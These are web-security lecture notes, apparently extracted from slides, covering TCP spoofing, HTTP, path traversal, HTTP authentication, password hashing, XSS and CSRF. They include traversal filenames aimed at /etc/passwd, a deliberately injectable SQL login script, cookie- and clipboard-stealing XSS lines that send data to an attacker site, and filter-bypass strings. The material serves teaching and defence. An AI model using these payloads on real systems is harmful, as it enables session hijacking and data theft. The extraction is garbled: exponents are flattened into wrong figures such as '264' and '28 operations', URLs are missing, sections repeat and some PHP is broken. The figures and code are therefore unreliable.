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Networking Basics
Intro Summary
HTTPS is a protocol that is intended to provide secure authentic communication between the
browser and the web server.
 The client knows the identity of (the owner of?) the server it is connected to.
 A third party cannot eavesdrop on connection between browser and server, nor
modify/inject messages between browser and server.
It is not necessarily the case that meeting these requirements means that the website is secure.
 What are we trying to protect? Is information sent to and/or from the webpage critical, ... ?
 What are threats are we concerned about? Is there a concern that attacker might:
eavesdrop on messages, modify/inject messages, compromise the server hosting the
website, ... ?
An asset is any entity of interest that may be the subject of a threat.
 The information on my website is an asset.
A threat is a potential for violation of security, eg.
 An attacker masquerades as my website.
 Denial of Service (DoS) attack on my website.
A vulnerability is a flaw or security weakness in an asset that has the potential to be exploited by a
 TCP/IP and HTTP does not provide authentication.
 TCP three-way handshake vulnerable to SYN flood, leads to DoS.
A countermeasure is an action or process that mitigates vulnerabilities and prevents and/or reduces
 HTTPS can provide for authentication of websites by browser.
 SYN-cache, SYN-cookies or firewalls helps prevent SYN flooding.
Packets sent across the internet contain ‘headers’ (simplified):
 Physical header: data related to physical link (MAC address, etc.).
 Network header: source and destination IP addresses.
 Transport header: data related to the connection (ports) and used to help manage faulttolerance (out of sequence packets, etc.).
 Application data of the application that is running over the connection.
HTTP is a stateless protocol: at the server-side the protocol keeps no record of past/current client
interactions. If state is required then the server (web) application and/or the client application must
manage this information.
Three-way handshake to establish a TCP connection:
 Msg 1 Source → Destination : SYN(x)
 Msg 2 Destination → Source : SYN(y), ACK(x + 1)
 Msg 3 Source → Destination : ACK(y + 1)
TCP/IP Spoofing I
In IPV4 there is no authentication of the IP addresses/network data.
Attacker first initiates a legitimate connection and observes the current server sequence number
from Server.
 Msgα1 Attacker → Server : SYN(x)
 Msgα2 Server → Attacker : SYN(y), ACK(x + 1)
 Msgα3 Attacker → Server : ACK(y + 1)
Attacker immediately initiates another connection with server, masquerading as a nonexistent/spoofed IP number A .
 Msgβ1 A[Attacker] → Server : SYN(x′)
 Msgβ2 Server → A : SYN(y′), ACK(x′ + 1)
 Msgβ3 A[Attacker] → Server : ACK(y′ + 1)
The server ACK (and y′) may be lost (not delivered to attacker), but the attacker can predict the value
of y′ based on their previous connection and establish the connection
TCP/IP Spoofing II
If connected, the legitimate owner of the spoofed address may respond by terminating a connection
it did not initiate:
 Msgβ1 A[Attacker] → Server SYN(x)
 Msgβ2 Server → A SYN(y), ACK(x + 1)
 Msgβ3 A[Attacker] → Server ACK(y + 1)
 Msgβ3 A → Server RST
The attacker must either use a non-existent IP address or ensure that the legitimate owner cannot
respond. The latter is done by either breaking/blocking A’s connection or syn-flooding A.
TCP/IP does not provide (strong) authentication of host.
There’s a limit on number of concurrent ‘half-open’ TCP connections per port. When limit is reached,
TCP discards all new incoming connection requests. Limit varies.
Half-open connections time-out (after around 75 seconds).
The attack:
 Attacker floods destination server with opening messages, flooding available connections
and denying valid connections.
 Attacker makes sure that SYNs are sent faster than half-open connections expire.
 IP numbers are non-existent/randomly generated.
 Source of attack not apparent since IP address is spoofed.
Distributed Denial of Service (DDOS): attacker uses a large number of compromised systems
(zombies) to carry out a distributed version of above.
Avoiding SYN Flooding Attacks
 Reduce the timeout period to a short time, eg 10 seconds to make it harder to maintain the
attack window; may deny legitimate access.
 Increase the number of half-open connections allowed. Increases resource requirements
 Disable non-essential services in order to reduce the number of ports that can be attacked.
 Synkill is an active monitor that inspects packet source IP address against good/bad lists of IP
addresses. Behaviour during 3-way handshake influences list membership.
 Use a firewall (in between public network and server) to throttle the number of packets
 Use SYN-cache, SYN-cookies.
TCP/IP Vulnerabilities: some other attacks
 Sniping Attacker gets sequence numbers from packets and sends an RST packet to close
 Hijacking Attacker snipes one end of a connection and takes over talking to the other side.
 Packet Sniffing Read contents of packet (eg user id/password)
 Echo Service (Port 7) Send packet to target IP spoofed from same IP; host may spend all its
resources in a loop echoing itself (fixed in most implementations).
 DNS Spoofing Typically weak authentication between name servers: convince local name
server that a domain name points to some IP address
 Probing
 Attempt connection to target host/port; RST reply means port is closed, probably.
Target may log the probe.
 As above, but attacker does not reply with a SYN/ACK; less likely that target will log
your probe.
 FIN scanning. Send a FIN packet; if port is closed then target sends a RST. If open
then target drops FIN. Less likely to be logged.
HTTP Basics
HTTP Basics
Paros is used to trap/examine/etc HTTP traffic to/from mybrowser.
Paros operates as a HTTP proxy used by the browser ie. All HTTP traffic between the web-server and
the browser goes through the Paros proxy.
HTTP Request
The first line of every HTTP request has three items, separated by spaces:
 Verb indicating the HTTP method (GET most common).
 Requested URL, with optional query string containing parameters indicated by ‘?’.
 HTTP version being used (typically 1.0/1.1).
Other information in the request:
 Referrer header indicates URL from which the request originated.
 User-Agent header provides information about browser, etc.
 Host header specifies hostname that appeared in the full URL (necessary for virtually hosted
 Cookie some ‘state’ that was stored by server on client during previous visit.
Not much privacy in the HTTP Request
A HTTP request gives away information about your host, operating system and browser
The Firefox plugin BrowserMasquerade can be used to block/modify some of the information sent in
a HTTP request.
The referrer header contains the URL of the web page from which the request originated.
Some websites use this to make sure that a request originated from one of their own pages, for
example to make sure that visitors go through the ‘front door’ web-page of their website.
However, since the referrer header is generate by the browser the user can easily change the
referrer (eg. Using BrowserMasquerade)to appear as if the user came via the front door.
HTTP Response
The first line of every HTTP response consists of three items, separated by spaces:
 HTTP version used
 Numeric status code indicating result of request. 200 (most common) means the request
was successful and the requested resource will follow.
 A textual reason phrase further describing response status.
Other headers include:
 Information about the Server software.
 A cookie to be set in the browser (if Set-Cookie present).
 The Pragma header if present instructs browser not to store response in its cache.
 The Connection header in this case indicates that the connection will be closed after
completion of the response (non-persistent).
Server Information Disclosure
A HTTP response may disclose information about the underlying system, web-server etc.
Disclosed web-server information may be useful to an attacker.
For example, Apache/1.3.37 (unix) is an old version of Apache and is vulnerable to a buffer-overflow
attack, which means that a ‘visitor’ to the website can get the Apache application to execute an
arbitrary piece of code on its server and thus gain control of the server. Knowing the version of the
software makes this easier for the attacker.
Configure the web-server so that it reveals as little information as possible about the server
For Apache, the configuration file httpd.conf has as default ServerTokens set to Full.
HTTP Response
Remember that Web-pages are hypertext and the material that you see on the page may be
composed of hypertext originating from a number of different sources/hosts.
Consider HTML (deprecated)
<meta http-equiv="Refresh" content="0; url=’’">
The response above causes a re-direct/the browser to issue a further GET to the
server, and the response can result in GETs to further URLs, and so forth.
Note that using a refresh meta-tag for URL redirection is discouraged by the W3C “[...] Developers
cannot predict how much time a user will require to read a page; premature refresh can disorient
users. Content developers should avoid periodic refresh and allow users to choose when they want
the latest information. [...] ” Should use a manual re-direct, a 3xx redirect response or Javascript.
Safe Requests
Get HTTP Method
The get method can be used to send parameters to the requested source in the URL string.
For example, a search for “php-security” on
An advantage of using GET parameters is that the document can be bookmarked.
However, they are also stored in logs, in the browser history and included in the Referrer header
when following a link. Also, early browsers did not encrypt the URL when running HTTPS.
GET parameters should not be used to transmit sensitive data.
A website uses the following form for user login webpage.
<form method="GET" action="/">
<p> Username <input type="text" name="username"></p>
<p> Password <input type="text" name="password"></p>
<p><input type="submit"></p>
If I enter my name and password then I arrive at the URL
 This URL can be bookmarked/stored in browser history and could beaccessed by anyone
who has access to my browser.
 It is not necessary to use this HTML form to login.
 Suppose that upon authentication the HTML response included a linkto another
webpage/site. In that case, the name and password will beincluded in the Referrer header
when the user clicks on that link.
The post method is designed for performing actions. Request parameters can be sent in the body of
the message. For example, the user homer logs into the Department’s moodle website with his
password simpson.
Upon authenticating, he arrives at in this case his username and
password are not included in the URL and it can be safely bookmarked, stored in history, etc.
Note: the username and password are still visible to anyone eavesdropping on the HTTP connection.
Hidden Elements in Forms
Used to transmit data via client in superficially an unmodifiable way.
For example, suppose that during authentication a user is identified as either a student or regular
customer by the website and this information is encoded using hidden elements in
subsequent webpages visited by the customer.
Student customers get a 20% discount when they use the order.php application.
Suppose that Alice, a regular/non-student customer authenticates and is presented with the
following form.
<form method="GET" action="">
<p> ItemID <input type="text" name="itemID"></p>
<p> Quantity <input type="text" name="quantity"></p>
<input type="hidden" name="kind" value="regular">
<p><input type="submit"></p>
Using this form Alice can ‘see’ only fields ItemID, Quantity and the submit button and should not get
the 20% discount.
However, Alice can see the parameters in the URL and can bypass the form and the intended
controls by entering the URL directly"1234"&quantity="8"&kind="student"
Changing the request method to POST does not avoid this problem since Alice can still bypass the
form/controls by generating the POST request directly/outside of the Browser.
Uploading To Safe Locations
Uploaded files may contain malicious programs or data and one needs to be sure that they cannot
end up in a directory where they could be misinterpreted.
Allowing an uploaded file to end up in a sub-directory of the document root (eg,
/Applications/MAMP/htdocs) that happens to be executable means that it may be possible for a
malicious user to upload a php program to the server which they then execute by visiting the URL.
Path Traversal Attack
Intention is that files with user-proposed names such as myfile are safely quarantined in a directory,
as /Applications/MAMP/private/myfile that is well away from system files and is not under the
document root.
However, the php server code does carry out any check on the validity of the filename proposed by
the user.
Suppose that malicious user proposed fileName="../htdocs/order.php"
Then the value of $new filename is
= /Applications/MAMP/htdocs/order.php
If order.php already exists in the document root then the malicious user has managed to overwrite it
with his own file!
We can use ”dot-dot-slash” path traversals to set up any target file.
Suppose instead that the user proposed
This is the path (on my server) for /etc/passwd where user passwords may be stored.
In a windows system an attacker can navigate only in a partition that locates web root. In the Linux
the attacker may be able to navigate in the whole disk
Filtering Path Information ina Filename
Could check for ‘‘../’’, etc., in user supplied data, but don’t forget that traversals can also be
expressed in a string as %2e%2e%2f.
A determined attacker can choose a different text encoding. For example, %u002e (16 bit unicode
encoding of “.”), etc. These should also be checked, as should the directory separator ‘\’ used by
Safer approach is to use function basename() to return just the filename without path information:
if (basename($_POST[’filename’]) == $_POST[’filename’]){
$new_filename= ’/Applications/MAMP/private/’.$_POST[’filename’]
Could alternatively use realpath() which reduces the path to its simplest form and then check that
the resulting path is acceptable to the server.
Path Traversal in General
The path traversal attacks are not limited to the file upload scenario.
It may occur anytime data from a client forms part of a filename/path at the server side.
For example, an application uses a dynamic page to return static images to the client with the name
of the image specified in a query string parameter.
Attacker uses path traversal sequence to attempt to access another file:
This attack can be avoided if the server filters the filename provided.
Past Path Traversal Attacks
On some older web-servers it was possible to carry out a path traversal attack on the URL itself and
to break out of the document root.
A web-server should block an attempt to visit the URL and keep the visitor within the document root.
Filtering Path Information in a Filename
Could check for ‘‘../’’, etc., in user supplied data, but don’t forget that traversals can also be
expressed in a string as %2e%2e%2f.
A determined attacker can choose a different text encoding. For example, %u002e (16 bit unicode
encoding of “.”), etc. These should also be checked, as should the directory separator ‘\’ used by
A safer approach is to use function basename() to return just the filename without path information:
if (basename($_POST[’filename’]) == $_POST[’filename’]) {
$new_filename= ’/Applications/MAMP/private/’.$_POST[’filename’]
Could alternatively use realpath() which reduces the path to its simplest form and then check that
the resulting path is acceptable to the server.
Path Traversal, in General
The path traversal attacks are not limited to the file upload scenario.
It may occur anytime data from a client forms part of a filename/path at the server side.
For example, an application uses a dynamic page to return static images to the client with the name
of the image specified in a query string parameter.
Attacker uses path traversal sequence to attempt to access another file:
This attack can be avoided if the server filters the filename provided.
Past Path Traversal Attacks
On some older web-servers it was possible to carry out a path traversal attack on the URL itself and
to break out of the document root.
A web-server should block an attempt to visit the URL
and keep the visitor within the document root.
Client Side Conclusions
As the visitor to a website you should be aware of and be comfortable with the data that is being
sent to the website.
 HTTP request can send quite a bit of detail about your system. This may violate your privacy
and/or reveal information about security vulnerabilities of your system.
 Sensitive data in URL may persist in the browser history, logs, subsequent requests (referer),
 You may not want to trust the website owner with your data (sensitive or otherwise).
You can use tools such as BrowserMasquerade to mask part of the information transmitted in the
However, it is up to your own judgement to decide whether it is safe to visit a particular website.
Keep your browser, server, etc. software up to date and reveal as little information as possible.
As a website owner/designer you should not rely on client-controls at the browser side to enforce
security of your application.
 Don’t assume that every request from a client comes via your forms.
 Don’t make decisions using hidden data in forms.
 Don’t make decisions using disabled data in forms.
 Don’t necessarily believe the headers from the client.
When uploading files remember that they may contain malicious code/data and be careful where
and how they are accessed and stored.
The server applications must filter and check all input data!
User Authentication
A security policy is typically defined in terms of the users of the system. An authentication
mechanism is needed to counter one user masquerading as another.
An authentication mechanism requires a user to prove that they are who they claim to be. This proof
can come from:
What the user knows e.g. passwords, pins
What the user has e.g. a key, a badge
What the user is e.g. fingerprint, retinal characteristics
Where the user is e.g. at a particular terminal
Some Authentication Threats
Password guessing: Shoulder surfing, eavesdropping on network traffic.
Inconvenience: hard to remember, have to carry authentication tokens, using same password for
different accounts.
Denial of Service: attacker behaviour (attempting to masquerade as target) results in account being
locked out.
Social Engineering: phishing.
Physical keystroke loggers, login-spoof, Trojan Horse program, pharming (redirecting website traffic
to a bogus website).
HTTP Request with Basic Authentication Information
If the user attempts to visit a URL that requires authentication (without providing
username/password) then the response is:
HTTP/1.1 401 Authorization Required
Date: Fri, 08 Oct 2010 08:02:04 GMT
Server: Apache
WWW-Authenticate: Basic realm="EnterPassword"
Content-Length: 460
Content-Type: text/html; charset=iso-8859-1
This instructs the browser to request a username/password.
The username and password is passed in a header in the HTTP request:
GET http://localhost/ HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Authorization: Basic aG9tZXI6c2ltcHNvbg==
User-Agent: Paros/3.2.13
This is not Particularly Secure
The authentication header provides the username and password encoded using Base64.
For example, the string homer is converted to aG9tZXI, in Base64.
In the example above, the Base64 encoding of the username and password is sent from the browser
to the server as plaintext over the HTTP protocol.
This means that a malicious user who can eavesdrop on this connection can discover the encoded
username and password and simply decode using Base64 and then masquerade as the user.
This basic HTTP authentication is adequate as weak form of authentication. However, if stronger
authentication is required then the connection should at least be made to the server over a secure
channel using HTTPS (which we will look at later).
Configuring the Web Server for HTTP Authentication
The web-server file .htacess is used to specify who may access documents under the directory that
includes this file .htaccess.
For example, placing the following .htaccess in my directory
/Applications/MAMP/htdocs/lab01 means that only authenticated user homer may access
documents in this directory.
AuthUserFile /Applications/MAMP/private/.htpasswd
AuthGroupFile /dev/null
AuthName EnterPassword
AuthType Basic
require user homer
The .htpasswd file specifies the user’s password.
The password is given in an ‘encrypted’ form (one-way hash) so that anyone who manages to read
the .htpasswd file cannot determine homer’s password.
However, just to be safe (defense in depth) we should not store the
.htpasswd file in the web document path.
Aside. In *nix, you can use the shell command htpasswd to ‘encrypt’ a password. For example,
htpasswd -nb homer doh!
generates the entry homer:jMbnDzxStXI9E.
Other Types of HTTP Authentication
HTTP also supports challenge-response based authentication. The browser proves that it knows the
password to the server without having to reveal it.
Msg1 : Browser ! Server : hello
Msg2 : Server ! Browser : challenge N
Msg3 : Browser ! Server : response h(N : username : password)
where h() is a special form of encryption (one-way hash function).
So long as the server generates a different challenge for every authentication attack then an
eavesdropper listening in on the exchange cannot discover the password (requires breaking the
encryption) nor can it carry out a replay attack since every authentication exchange is different.
HTTP provides NTLM and Digest as challenge-response protocols.
However, due to a number of factors, these protocols are not much more effective than Basic. In
practice, complex web-applications implement their own authentication mechanisms.
Authenticating with Digest
A user attempts to visit a website which is configured to use challenge-response authentication. The
response is:
HTTP/1.1 401 Authorization Required
Date: Fri, 08 Oct 2010 09:14:18 GMT
Server: Apache
WWW-Authenticate: Digest realm="EnterPassword",
nonce="gXpwbxeSBAA=4d0a4e5c20fa710a5cd920170b521f5141503755", algorithm=MD5,
Content-Length: 460
Content-Type: text/html; charset=iso-8859-1
The browser obtains the user-id and password from the user and this is the response.
GET http://localhost/ HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Authorization: Digest username="homer", realm="EnterPassword",
nonce="gXpwbxeSBAA=4d0a4e5c20fa710a5cd920170b521f5141503755", uri="/",
response="43cf12bd3f8ae897174783e9d6e9dfea", qop=auth, nc=00000001,
User-Agent: Paros/3.2.13
Group Based Access Control Policies
You can organize the users who may access the website/page according to groups and then allow
access based on these groups.
AuthUserFile /Applications/MAMP/private/.htpasswd
AuthGroupFile /Applications/MAMP/private/.htgroup
AuthName EnterPassword
AuthType Basic
require group cs3511
and the .htgroup file defines the groups.
cs3511: homer monty bart
Assuming that the passwords for these users are in the .htpasswd file.
Blocking Access Based on IP
You can block access to your website/page by specifying access controls by IP address. For example,
block access from and from the system
order allow,deny
deny from
deny from
allow from all
Using an IP address is a weak form of access control since it is possible for the visiting system to
spoof its IP address.
A Simple Web Login Mechanism
Suppose that only registered users are permitted access to the website.
In order to login (be authenticated) a user must provide a user name and password to the login form
The following is a (poor) example of how this authentication might be implemented at the server.
 A database table contains the names of authorized users and their corresponding
 The login script checks whether the provided username/password appear in the table.
 A session to the main website page is created for an authenticated user.
The Database Table
CREATE TABLE passwordTable (
‘username‘ varchar(8) NOT NULL,
‘password‘ varchar(8) NOT NULL,
PRIMARY KEY (‘username‘)
Note that specifying username as primary key ensures that it is not possible to have two users with
the same name.
The Login Form
<form action="" method="POST">
<p> Username: <input type="text" name="myusername" /></p>
<p> Password: <input type="password" name="mypassword" /></p>
<p> <input type="submit" /></p>
Note that input type="password" prevents a shoulder-surfing attack bydisplaying each typed
password character as •.
The request is sent via HTTP and the userid and password are sent asplaintext and could be
discovered by a attacker eavesdropping on the connection.
The Login Script: Connecting To The Database
$host="localhost"; // Host name
$user="..."; // Mysql username
$password="..."; // Mysql password
$dbname="CS3511"; // Database name
$tbl_name="passwordTable"; // Table name
$dbconnection = mysql_connect( $host, $user, $password );
if ( ! $dbconnection ) {
// Try to select database
$dbselection = mysql_select_db( $dbname );
if ( ! $dbselection ) {
The Login Script: Continued, Check Username / Password
// DANGER: these **should** be filtered, among other things...
$sql="SELECT * FROM $tbl_name
WHERE username=’$myusername’ and password=’$mypassword’";
else {
echo "Wrong Username or Password";
(we’ll look at how to correctly filter the input and set up the session later)
Attacking the Login Script
Password Guessing. A malicious user could try ‘likely’ passwords for a given user. This assumes that
the attacker knows a valid username.
 On failure, script should not reveal whether or not username is valid.
Dictionary Attack. A malicious user could write an attacking script that tries all possible words from a
dictionary as the password for a given user.
 Passwords should not be words from a dictionary.
Brute Force Attack. A malicious user could write an attacking script that tries all possible 8-character
strings as passwords. This is a large number of tests that may be impractical over a network;
however, the malicious user could reduce the search space by trying, for example, just lowercase
 User should be required to pick long passwords that are a mix of upper/lower case letters,
digits, etc.
A simple throttling mechanism could be added to the code whereby a login attempt fails if it made
within 15 seconds (for example) of a previous failure.
Protecting Stored Passwords
The web-server stores the username/password pairs in the database table passwordTable. This
means that anyone (eg, administrator) who has access to the database can lookup a user’s
This is not considered good practice.
 The administrator of the web-site may be able deduce (same?) the passwords you use on
other web-sites for which the administrator has no authority.
 If the web-site is compromised then an attacker will be able to discover user passwords.
 Remember the principle of least privilege.
We would like some way to be able to avoid storing the password while at the same time being able
to test whether a user-supplied password is valid.
We will use a cryptographic one-way hash function.
One Way Hash Function
A function h maps arbitrary length value x to fixed length value y such that:
 Hard to reverse. Given value y not feasible to find x with y = h(x).
 Collision freeness. Hard to find values x, x′ such that h(x) = h(x′).
 Unpredictability. The hash value h(x) does not give any information about any part of its
operand x.
Protecting the Password Database Using One-Way Hash Function
Rather than store a user password as cleartext in the database table we store the one-way hash of
the password.
An attacker who obtains a copy of the database table will not be able to determine the password, as
doing so would mean reversing a one-way hash function
When checking a submitted password, the login.php script simply hashes the password provided and
checks that against the database.
$sql="SELECT * FROM $tbl_name
WHERE username=’$myusername’ and password=’$mypassword’";
Finding Passwords from Hash Functions
If the attacker has managed to obtain a copy of the (hashed) password database then how might
s/he figure out a user’s password?
Recall the property:
 Collision freeness. Hard to find values x, x′ such that h(x) = h(x′).
(We’ll see later that this is very important for digital signatures.)
If I have a specific x and h(x) and I’m searching for another y such that
h(y) = h(x) then the effort required will be about 2n for an n bit hash value.
However, if I don’t care about what values x and y are found that have the relationship h(x) = h(y)
then we have a good chance of finding some pair 2n/2 due to the Birthday Paradox.
For example, we have good chance of finding a pair of messages m and m′ such that md5(m) =
md5(m′) with just 264 tests, making it vulnerable to brute-force attack.
However, MD5 suffers a serious design flaw which means a collision can be found within 28
operations and recently collisions were found in SHA1 in 263 operations. Currently, SHA256 and
SHA512 are considered safe.
Pre-computation Dictionary Attack on the (Hashed) Password Table
Attacker builds table of dictionary words and corresponding hash values.
Attacker merges (join) this table against passwordTable in hope of matching a poorly chosen
The cost of storing and building a dictionary table is small and the attacker can use multiple
dictionaries. Use dictionaries for different languages, Klingon, lines from songs, etc.
The attacker can also find users with the same password.
This dictionary attack is an example of a pre-computation attack: most of the effort goes into
building the dictionary, while the seach/merge is relatively cheap and the dictionary can be re-used.
Using Salt to Defend Against Dictionary Attacks
Strategy: make it impractical to build a dictionary table.
When a password is chosen by the user, a random salt value is generated and hashed with the
password. The password table stores the username, the chosen salt and a hash of the salt and
If the salt is large then building the dictionary table beomes costly.
Authenticating with HTTP
For HTTP authentication the web-server stores a list of userid/passwords.
The hash of the password is stored so that an attacker cannot discover a user’s password from the
.htpasswd file.
The htpasswd tool can be used to generate the correct userid/salt/hashed password entry for Basic
HTTP authentication. This generates a random salt value and the htpasswd entry for the given userid
and password:
userid : salt.md5(salt.password)
When a user authenticates under HTTP Basic authentication then the web-server retrieves the user’s
entry in the password file, obtains the salt, re-computes md5(salt.password) given the password
passed from the browser and compares the result with the stored hash.
If Digest HTTP authentication is used then the user/password must be stored differently since the
web-server needs to ‘know’ the user’s password in order to check the validity of the user’s response.
The htdigest tool can be used to generate the entry for the password file in this case.
One Way Hash Function in PHP
One way hash functions are also called Message Digests. PHP provides function that implement md5
(V.4 onwards) and sha1 (V.4.3 onwards).
When a user first picks a password, a random salt should be generated and the hash of the salt and
password stored in the password database.
$salt= openssl_random_pseudo_bytes(2,True);
$hpasswd= $sha1($salt.$password);
//store the userid, hpassword *and* the salt
This uses a secure random (True) salt string of length 2.
When the user logs in, the login script looks up the user’s salt, recomputes the hashed salted
password and compares the result against the stored value $hpasswd.
Cross Site Scripting
Cross site scripting (XSS) is one of the best known types of web attacks.
XSS results in the insertion of malicious (JavaScript) code into a web-page that the user trusts.
The user unknowingly accesses the page and executes the script which could cause credentials and
cookies to be stolen, key logging, Denial of Service . . .
XSS is the most prevalent web-vulnerability, appearing in around 70% of all websites and accounting
for around 20% of Common Vulnerabilities and Exposures vulnerabilities.
JavaScript Security
A JavaScript program downloaded in the browser from a web-page executes in a Java-like ‘sand-box’
that limits the local system resources that it may access.
JavaScript’s same-origin security policy prevents scripts loaded from one origin (Web site) from
getting or setting properties of a document loaded from a different origin. This policy prevents
hostile code from one origin from taking over or manipulating documents from another. More
precisely, an origin is identified by domain, port and application protocol.
Without this policy, JavaScript from a hostile site could do any number of undesirable things such as
snoop keypresses while you’re logging in to a site in a different window, wait for you to go to your
online banking site and insert spurious transactions, steal login cookies from other domains, etc.
Suppose that when Bob visits the website, the response includes the JavaScript
<p><script>alert(’Code from Alice’);</script></p>
Bob’s browser executes the script as it obeys the same-origin policy.
Bob visits and a new browser window pops up (JavaScript also originates from
var w =;
// Wait a while, hoping they’ll start using the newly opened window.
// After 10 seconds, let’s try to see what URL they’re looking at!
var snoopedURL;
setTimeout("snoopedURL = w.location.href()", 10 * 1000);
Bob’s browser executes the script as it obeys the same-origin policy.
However, suppose that this script was loaded from, then the w.location.href would
fail/be blocked by the browser as it references a different document origin.
Many of the variables that can be accessed by a JavaScript program are relative to the current
For example, the following script sends any cookies related to the current document to the site
document.location =
’’ +
If the page embedded this JavaScript then it will send any cookies related to this
document/website to itself.
If Alice’s web-site embedded this JavaScript, then when Bob visits her site the program sends
his cookies to In principle this is not an issue since its Alice’s decision to include this
code on her website and in visiting Alice’s web-page, Bob presumably trusts Alice’s intentions....
XSS Example, the Vulnerability
Alice’s web application allows users to enter comments on a web-page. The following form is used.
<form action="comment.php" method="post" />
<p>Name: <input type="text" name="name" /><br />
Comment: <textarea name ="comment" rows="10" cols="60"></textarea><br />
<input type="submit" value="Add Comment" /></p>
The application displays comments to other users who visit the page.
Suppose that the comment-viewing application (web-page) includes the following code to output a
single $comment and corresponding $name.
<? php
echo "<p>$name writes:<br />";
echo "<blockquote>$comment</blockquote>";
XSS Example, Exploiting the Vulnerability
A malicious user of this application can embed any html within their name and comment (request)
and this html will form part of the application response to another user reading the comments.
For example, Malicious Mike’s request includes:
$comment=<p><script>alert(’Code from Alice’);</script></p>
When Bob reads Mike’s comment, the server response includes the HTML
Mike writes:<br />
<blockquote><p><script>alert(’Code from Alice’);</script></p>
and a pop-up message appears on Bob’s screen! This is an example of a fairly benign attack.
However, suppose that malicious Mike makes a request to comment.php that includes (in
document.location =
’’ +
Now, when Bob views Mike’s comment on Alice’s web site, Bob’s cookies (for Alice’s webapplication/site) are sent to
This attack occurs because malicious Mike manages to embed his own malicious code in the HTML
response from Alice to Bob.
XSS Attack Payloads
The above example demonstrates cookie-stealing code as XSS payload (session hijacking). Other
kinds of payload include the following.
 Virtual Defacement that does not modify the underlying server-data but interferes with the
way that it is rendered on a web-page.
 Trojan Horse. Injected XSS code adds new functionality to web-site. For example, asking the
user for credit-card details, etc.
 Masquerading user. The JavaScript code performs some action (eg administrative) as the
 JavaScript that directly attacks the user. For example, other applications may use the
clipboard but not clear it after use. Steal clipboard data with
’’+window.clipboard.getData(’Text’); (of course, this attack is
not limited to just XSS)
Detecting XSS Vulnerabilities
A simple strategy for testing for XSS vulnerability is to use attack string:
which should be submitted as every parameter to every page of an application and responses
Some applications use simple blacklist filters that look for <script> strings within request parameters
and remove, encode or block the request.
They might not detect all possible configurations of a script call:
"><ScRiPt> alert(document.cookie)</ScRiPt>
Simply checking for <script>, etc., may be problematic if the response already includes <script>: the
attacker may be able to inject their own code within this response. For example, the php code may
echo "<script>var a=’$myParameter’; .... </script>"
and the attacker simply terminates the single quotation marks around $myParameter and injects
their own code into the request
$myParameter= ’ \’; alert(document.cookie); ’
and the resulting response looks like
<script>var a=’ ’; alert(document.cookie); .... </script>
Avoiding XSS
XSS occurs as a result of a poorly implemented Web-application not properly filtering and cleaning
its input/output data.
Avoid XSS by
 Disable scripting in the browser.
 Educate users.
 Validate input.
 Filter output.
 Encode properly.
Avoiding XSS in PHP
You should at least use htmlentities() to escape any data that you send to the client. This function
converts all special characters into their HTML entity equivalents. Any character that the browser
interprets in a special way is converted to its HTML entity so that its original value is preserved.
$cleanName=htmlentities($name, ENT_QUOTES, ’UTF-8’);
$cleanComment=htmlentities($comment, ENT_QUOTES, ’UTF-8’);
echo "<p>$cleanName writes:<br />";
echo "<blockquote>$cleanComment</blockquote>";
This converts: & to & ’’ (double quote) to " ’ (single quote) to ' < (less than) to &lt,
and > (greater than) becomes &gt.
Use html entity decode() to retrieve original string, if needed.
Reflected XSS
The XSS attacks in the slides above are called persistent XSS attacks whereby attacker manages to
embed Javascript into your site’s database.
A reflective XSS attack occurs when the attacker embeds JavaScript into a link to your site and tricks
a user in to following it.
(All from
Detecting XSS in the Browser
In principle, it is a good idea to disable scripts in the browser and use a plugin such as NoScript to
selectively enable scripts for ‘trusted sites’.
Simple reflective XSS attacks are relatively easy to detect in the browser.
For example, MS Internet Explorer8 and the Firefox plugin NoScript blocks reflective XSS attacks.
Of course, these just provide defense in depth for the client and do not ‘protect’ the server.
A cross site scripting vulnerability provides an attacker with a way to bypass JavaScript’s same-origin
security policy.
You should filter and clean all input data to a web application and check that it is as expected.
Web applications should also escape everything on output and only un-escape stuff that you know is
safe and that you know contains markup you want to execute.
Developer should test web-application for XSS by injecting attack strings (automated tools available).
Browser controls provide useful defense-in-depth/additional check for users but do not make the
web-application any more secure.
Using HTTPOnly Header in HTTP Response
If the HttpOnly flag in the HTTP response header is set then the cookie cannot be accessed through a
client side script (if the browser supports this flag). As a result, even if a XSS flaw exists, and a user
accesses a link that exploits this flaw, the browser will not reveal the cookie to a third party.
If a browser does not support HttpOnly and a website attempts to set anHttpOnly cookie, the
HttpOnly flag will be ignored by the browser, thus creating a traditional, script accessible cookie.
This header can be set in PHP as default in php.ini using session.cookie httponly, or programatically
by setting parameter http-only to TRUE:
Cross Site Request Forgeries
Cross Site Attacks
Cross Site Scripting (XSS) attack occurs when a malicious user inserts code into a web-page that a
user trusts.
Cross Site Request Forgery (CSRF) occurs when a malicious web site causes a user’s web browser to
execute an unwanted action on a trusted site.
The HTML <img> Tag
Insert an image into an HTML document.
<img src="">
This instructs the browser to (silently) download an image using request:
The <img > tag causes an HTTP GET request by the browser regardless of the value of the given URL.
The browser does not know beforehand whether the URL is a gif, jpg or something else. It needs to
load/GET it into the browser in order to determine this. After all, the image could be generated by
some program.
<img src="">
Alice is authorised to Access the Website
Suppose that provides an application that can be used to set the current image. For example,
Alice requests:
in order to set the current image to the image 1234.
Suppose that website uses HTTP Basic authentication to control who may access/set the image and
Alice has access to the website.
Malicious Mike does not have access but would like to change the current image to 5678.
He needs to trick Alice into submitting the HTTP request:
Authorization: Basic ...... (Alice’s credentials)
Malicious Mike is not authorised to Access
Suppose that Malicious Mike owns the website and the web-page index.html on this site
<img src="">
Alice visits and the image tag causes Alice’s browser to silently perform
Note that we assume here that Alice has configured her browser to ’remember’ her userid/password
from some previous visit to the website and that the browser does not prompt her to
confirm entry.
CSRF and Same Origin Security Policy
A Cross Site Request Forgery occurs when an attacker can get a victim to perform an unwanted
action on another site (where the victim holds the authorization to carry out the action).
A CSRF attack attempts to exploit authorizations that the victim already holds. If the user has logged
on to a web-site (and holds session authentication cookies) then the attacker will try to get the user
to carry out an action that is authenticated by those cookies.
The same origin policy was designed to prevent an attacker from accessing data on a third party site.
The policy does not prevent requests from being sent, it only prevents an attack from reading the
